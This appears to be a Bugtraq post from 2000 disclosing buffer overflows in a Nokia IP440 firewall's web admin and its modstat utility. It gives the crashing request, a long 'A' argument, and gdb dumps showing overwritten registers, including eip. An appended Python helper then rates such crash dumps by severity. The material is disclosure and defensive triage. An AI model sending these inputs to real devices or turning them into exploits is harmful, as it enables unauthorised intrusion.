Message-ID: <3A223877.2C67CAD0@ktwo.ca>
Date: Mon, 27 Nov 2000 02:33:27 -0800
From: K2 <ktwo@ktwo.ca>
X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 i86pc)
X-Accept-Language: en
MIME-Version: 1.0
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Nokia firewalls
References: <200011240926.eAO9Qql00340@tbird.iworld.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hi,
Well, I just unwrapped my shiny new Nokia IP440 integrated
Firewall-1/IDS appliance and thought to give it a once-over. It appears
to be an older fBSD kernel + some firewall (Checkpoint 4.1) + some IDS
(ISS) + remote admin (SSH/http).

Now these vulnerabilities all require an authenticated user; however,
it's still amazing to me that a device with security as its primary
function would have so many issues.

A request to its default http administration site...
http://127.0.0.1/cgi-bin/html_page?(Ax6000)&TEMPLATE=main

will result in "Html_gen exited because of signal: Segmentation fault".
After this, any attempt to connect to the site will return
"Error while getting page: Couldn't connect to /tmp/xsets: No such file
or directory".

/bin/xpand will die, dumping core in /var/tmp...
scrooge:/var/tmp# gdb -c xpand.core-11.27.2000-094458
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
Modified in 1997, 1998 by Nokia IP Inc.
There is absolutely no warranty for GDB; type "show warranty" for
details.
GDB 4.13 (i386-unknown-freebsd), Copyright 1994 Free Software
Foundation, Inc.
Core was generated by `xpand'.
Program terminated with signal 11, Segmentation fault.
#0 0x10046fb6 in ??
(41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4)
(gdb) file xpand-11.27.2000-094458
Reading symbols from xpand-11.27.2000-094458...done.
(gdb) bt
#0 0x10046fb6 in end
(41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4)
#1 0xefbfd3b8 in end
(41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4)
#2 0x10047110 in end
(7d380, 41414141, 1004f060, 36158, 33b18, efbfd3f0, 100446df, 7cb40)
#3 0x10044233 in end
(7cb40, 41414141, 41414141, 0, 1004f060, efbfd408, 1004416c, 5fec0)
#4 0x100446df in end
(5fec0, 41414141, 41414141, 1004f060, efbfd42c, 1004732e, 3a020,
efbfd444)
#5 0x1004416c in end
(3a020, efbfd444, 1004f060, 5fec0, 31680, 0, 56, efbfd44c)
#6 0x1004732e in end
(321a0, 10044144, efbfd444, 1004f060, 100446bc, 5fec0, efbfd46c,
10044713)
#7 0x100441ac in end
(332a0, 100446bc, 5fec0, efbfd4b0, 7f0c0, 0, efbfd65c, 21983)
#8 0x10044713 in end (31680, 10013, 17a7, 66000, 0, 0, 0, 0)
#9 0x21983 in handle_template_request (d=0x34000,
request=0x66000 "USER admin\n", 'A' <repeats 189 times>...,
request_len=6055, fd=9, fd_af=1, 1004f060, 40f40, 654b0) at
xcommit.c:1053
#10 0x22d6a in stream_set (
fdi=0x654a0, 1004f060, 1, 654b0, 0, 6b64632f, 62696c00, 40) at
xpand.c:179
#11 0x10041491 in end (0, 1, 0, 38000, efbfda60, 23354, 1, 0)
#12 0x10046ec0 in end (1, 0, efbfda88, efbfda84, 0, 654a0, 29000, d)
---Type <return> to continue, or q <return> to quit---
#13 0x23354 in main (argc=1, argv=0xefbfda88, efbfda90, 0, 0, 29000, 0,
1)
at xpand.c:385
(gdb) info reg
eax 0x41414141 1094795585
ecx 0x41414141 1094795585
edx 0x0 0
ebx 0x1004f060 268759136
esp 0xefbfd394 0xefbfd394
ebp 0xefbfd394 0xefbfd394
esi 0x7d380 512896
edi 0x41414141 1094795585
eip 0x10046fb6 0x10046fb6
ps 0x10206 66054
cs 0x1f 31
ss 0x27 39
ds 0xefbf0027 -272695257
es 0x80027 524327
(gdb)


also....


scrooge:/var/tmp# gdb -c html_gen.core
(gdb) info reg
eax 0x88dc 35036
ecx 0xfffffffc -4
edx 0x4949 18761
ebx 0x1009b060 269070432
esp 0xefbfaa74 0xefbfaa74
ebp 0xefbfaa84 0xefbfaa84
esi 0x0 0
edi 0x41414141 1094795585
eip 0x10084d1b 0x10084d1b
ps 0x10216 66070
cs 0x1f 31
ss 0x27 39
ds 0x27 39
es 0x27 39
(gdb)

also,

scrooge:/var/tmp# ./modstat -n
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Type Id Off Loadaddr Size Info Rev Module Name
modstat: LMSTAT: Bad file descriptor
Segmentation fault (core dumped)
(gdb) info reg
eax 0x4 4
ecx 0xefbfcfb8 -272642120
edx 0xefbfcfb8 -272642120
ebx 0x0 0
esp 0xefbfd354 0xefbfd354
ebp 0x41414141 0x41414141
esi 0xffffffff -1
edi 0x3 3
eip 0x41414141 0x41414141


Anyhow, I just thought they may want to clean these things up...
K2
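The three `info reg` dumps above all show the same tell: registers full of the input byte (0x41414141 = "AAAA"), with eip itself overwritten in the modstat case. The following triage helper is an added example, not code from the post or from Nokia; it parses gdb `info reg` output, flags registers holding a single repeated printable byte, and ranks the crash by which registers were reached. The sample dumps embedded below are copied from the post and trimmed to the relevant lines.

```python
import re
from typing import Dict, Optional

# Lines as printed by `info reg` on the i386 GDB 4.13 build in the post: "name 0xhex decimal".
REG_LINE = re.compile(r"^\s*(?P<name>[a-z]+)\s+0x(?P<hex>[0-9a-f]+)\b")

def parse_info_reg(text: str) -> Dict[str, int]:
    """Map register name -> value for every register line in a gdb `info reg` dump."""
    regs = {}
    for line in text.splitlines():
        m = REG_LINE.match(line)
        if m:
            regs[m.group("name")] = int(m.group("hex"), 16)
    return regs

def fill_byte(value: int, width: int = 4) -> Optional[int]:
    """Return the byte if `value` is one printable byte repeated across the whole register.
    Only printable bytes count (the inputs in the post are URL and argv text), so sentinels
    such as 0x00000000 and 0xffffffff (-1, see esi in the modstat dump) are not flagged."""
    b = value & 0xFF
    if 0x20 <= b < 0x7F and all(((value >> (8 * i)) & 0xFF) == b for i in range(width)):
        return b
    return None

def triage(text: str) -> dict:
    """Classify a crash by which registers hold a repeated input byte (e.g. 0x41414141 = 'AAAA')."""
    regs = parse_info_reg(text)
    tainted = {n: fill_byte(v) for n, v in regs.items() if fill_byte(v) is not None}
    if "eip" in tainted:
        severity = "critical"   # instruction pointer overwritten: control flow is input-chosen
    elif "ebp" in tainted or "esp" in tainted:
        severity = "high"       # frame or stack pointer overwritten: eip goes on the next return
    elif tainted:
        severity = "medium"     # only data registers: still a memory-safety bug that needs a fix
    else:
        severity = "low"        # no fill pattern in registers; check the backtrace frames instead
    return {"severity": severity, "tainted": sorted(tainted)}

# Register dumps copied from the post (xpand, html_gen, modstat), trimmed to the lines that matter.
XPAND = ("eax 0x41414141 1094795585\necx 0x41414141 1094795585\nebx 0x1004f060 268759136\n"
         "ebp 0xefbfd394 0xefbfd394\nedi 0x41414141 1094795585\neip 0x10046fb6 0x10046fb6\n")
HTML_GEN = "ecx 0xfffffffc -4\nedi 0x41414141 1094795585\neip 0x10084d1b 0x10084d1b\nes 0x27 39\n"
MODSTAT = "ebp 0x41414141 0x41414141\nesi 0xffffffff -1\nedi 0x3 3\neip 0x41414141 0x41414141\n"

if __name__ == "__main__":
    for name, dump in (("xpand", XPAND), ("html_gen", HTML_GEN), ("modstat", MODSTAT)):
        print(name, triage(dump))
```

Note that register triage alone under-rates the xpand crash: its registers are only "medium", but frame #1 in the backtrace sits at a stack address (0xefbfd3b8), which says the saved return address was corrupted as well.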